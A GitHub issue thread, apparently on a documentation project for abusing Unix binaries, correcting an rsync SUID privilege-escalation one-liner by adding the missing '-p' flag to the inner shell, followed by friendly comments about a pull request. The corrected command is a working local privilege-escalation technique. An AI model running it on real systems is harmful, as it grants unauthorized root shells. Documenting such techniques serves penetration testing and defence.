-
Notifications
You must be signed in to change notification settings - Fork 1.3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
The SUID authorization command of the rsync command is incorrect; Missing - p parameter #388
Comments
Good catch! Feel free to file a PR if you want. |
@Jpkie why close? |
I thought that the author has been revised and I don't know what do you mean by said PR because I'm not often use a lot, don't know much about some terms. I'm sorry. I need to create an issue again? I am using translation software to communicate. |
Sorry for the confusion, I meant that you're correct and if you want you can create a pull request if you like, so that you can contribute yourself to this project. But don't worry I can do that for you. :) |
Thank you. If you could do this!:); ) |
Original command:
rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
In
"sh 1>&2 0>&2"
, the - p parameter inheritance permission is missing after the command sh; Causing the failure of power raising;Modified command:
rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
The text was updated successfully, but these errors were encountered: